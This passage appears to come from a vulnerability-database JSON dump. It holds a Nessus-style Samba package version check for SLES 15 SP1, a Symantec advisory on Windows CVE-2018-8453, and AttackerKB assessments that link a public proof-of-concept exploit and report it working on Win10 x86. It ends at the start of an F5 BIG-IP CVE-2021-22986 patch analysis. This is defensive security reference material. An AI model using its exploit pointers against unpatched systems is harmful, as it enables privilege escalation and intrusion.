sp:\"1\", reference:\"samba-ad-dc-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-ad-dc-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-client-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-client-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-core-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-debugsource-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-dsdb-modules-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-dsdb-modules-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-python-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-python-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-libs-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-python-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-python-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-winbind-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"1\", reference:\"samba-winbind-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libndr0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-errors0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libsmbldap2-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-libs-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-binding0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-binding0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-samr-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-samr0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc-samr0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libdcerpc0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-krb5pac-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-krb5pac0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-krb5pac0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-nbt-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-nbt0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-nbt0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-standard-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-standard0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr-standard0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libndr0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libnetapi-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libnetapi0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libnetapi0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-credentials-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-credentials0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-credentials0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-errors-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-errors0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-errors0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-hostconfig-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-hostconfig0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-hostconfig0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-passdb-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-passdb0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-passdb0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy-python3-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy0-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-policy0-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-util-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-util0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamba-util0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamdb-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamdb0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsamdb0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbclient-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbclient0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbclient0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbconf-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbconf0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbconf0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbldap-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbldap2-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libsmbldap2-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libtevent-util-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libtevent-util0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libtevent-util0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libwbclient-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libwbclient0-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"libwbclient0-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-ad-dc-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-ad-dc-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-client-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-client-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-core-devel-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-debugsource-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-dsdb-modules-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-dsdb-modules-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-python-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-python-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-libs-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-python-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-python-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-python3-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-python3-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-winbind-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\nif (rpm_check(release:\"SLED15\", sp:\"1\", reference:\"samba-winbind-debuginfo-4.9.5+git.373.26895a83dbf-3.44.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"samba\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "symantec": [{"lastseen": "2021-06-08T19:05:41", "description": "### Description\n\nMicrosoft Windows is prone to a local privilege-escalation vulnerability that occurs in the Windows kernel. A local attacker can exploit this issue to execute arbitrary code in kernel mode with elevated privileges.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 Version 1803 for 32-bit Systems \n * Microsoft Windows 10 Version 1803 for x64-based Systems \n * Microsoft Windows 10 Version 1809 for 32-bit Systems \n * Microsoft Windows 10 Version 1809 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1703 for 32-bit Systems \n * Microsoft Windows 10 version 1703 for x64-based Systems \n * Microsoft Windows 10 version 1709 for 32-bit Systems \n * Microsoft Windows 10 version 1709 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 1709 \n * Microsoft Windows Server 1803 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 \n * Microsoft Windows Server 2019 \n\n### Recommendations\n\n**Permit local access for trusted individuals only. Where possible, use restricted environments and restricted shells.** \nTo exploit this vulnerability, an attacker requires local access to an affected computer. Grant local access for trusted and accountable users only. \n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2018-10-09T00:00:00", "type": "symantec", "title": "Microsoft Windows Kernel 'Win32k.sys' CVE-2018-8453 Local Privilege Escalation Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2018-8453"], "modified": "2018-10-09T00:00:00", "id": "SMNTC-105467", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/105467", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2021-07-20T20:12:31", "description": "\u201cAn elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory\u201d \u2013 MITRE description.\n\n \n**Recent assessments:** \n \n**jrobles-r7** at June 17, 2019 6:51pm UTC reported:\n\nThe handling of objects in memory allowed for a double-free of a memory region, which could be used to escalate privileges on a local system. See MSRC link for vulnerable versions and patch information.\n\nThe <https://github.com/ze0r/cve-2018-8453-exp> PoC for x86 systems successfully worked for me on Win10 x86 systems. The x64 version did not work for me though.\n\n**space-r7** at June 20, 2019 2:12pm UTC reported:\n\nThe handling of objects in memory allowed for a double-free of a memory region, which could be used to escalate privileges on a local system. See MSRC link for vulnerable versions and patch information.\n\nThe <https://github.com/ze0r/cve-2018-8453-exp> PoC for x86 systems successfully worked for me on Win10 x86 systems. The x64 version did not work for me though.\n\n**gwillcox-r7** at November 22, 2020 2:58am UTC reported:\n\nThe handling of objects in memory allowed for a double-free of a memory region, which could be used to escalate privileges on a local system. See MSRC link for vulnerable versions and patch information.\n\nThe <https://github.com/ze0r/cve-2018-8453-exp> PoC for x86 systems successfully worked for me on Win10 x86 systems. The x64 version did not work for me though.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 4\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-10-10T00:00:00", "type": "attackerkb", "title": "CVE-2018-8453", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8453"], "modified": "2020-02-13T00:00:00", "id": "AKB:0A30FB79-83AC-42D6-964B-DD2D15CDC6C2", "href": "https://attackerkb.com/topics/KLM3vtDk2e/cve-2018-8453", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-27T14:39:10", "description": "On BIG-IP versions 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2, the iControl REST interface has an unauthenticated remote command execution vulnerability. Note: Software versions which have reached End of Software Development (EoSD) are not evaluated.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 14, 2021 10:18am UTC reported:\n\n# CVE-2021-22986\n\n_This writeup has been updated to thoroughly reflect my findings and that of the community\u2019s. Thank you!_\n\n[This vulnerability](<https://support.f5.com/csp/article/K03009991>) appears to involve some kind of auth bypass or even SSRF, judging by my patch analysis and testing. The full-context patch below has its line numbers adjusted for use in a debugger.\n \n \n diff --git a/com/f5/rest/app/RestServerServlet.java b/com/f5/rest/app/RestServerServlet.java\n index 9cd36e1..c0c67d6 100644\n --- a/com/f5/rest/app/RestServerServlet.java\n +++ b/com/f5/rest/app/RestServerServlet.java\n @@ -1,538 +1,539 @@\n package com.f5.rest.app;\n \n import com.f5.rest.common.ByteUnit;\n import com.f5.rest.common.HttpParserHelper;\n import com.f5.rest.common.RestHelper;\n import com.f5.rest.common.RestLogger;\n import com.f5.rest.common.RestOperation;\n import com.f5.rest.common.RestOperationIdentifier;\n import com.f5.rest.common.RestRequestCompletion;\n import com.f5.rest.common.RestServer;\n import com.f5.rest.common.RestWorkerUriNotFoundException;\n import java.io.ByteArrayOutputStream;\n import java.io.IOException;\n import java.net.URI;\n import java.net.URISyntaxException;\n import java.nio.charset.StandardCharsets;\n import java.util.Enumeration;\n import java.util.HashMap;\n import java.util.Map;\n import java.util.logging.Level;\n import java.util.logging.Logger;\n import javax.servlet.AsyncContext;\n import javax.servlet.ReadListener;\n import javax.servlet.ServletException;\n import javax.servlet.ServletInputStream;\n import javax.servlet.ServletOutputStream;\n import javax.servlet.WriteListener;\n import javax.servlet.http.HttpServlet;\n import javax.servlet.http.HttpServletRequest;\n import javax.servlet.http.HttpServletResponse;\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n 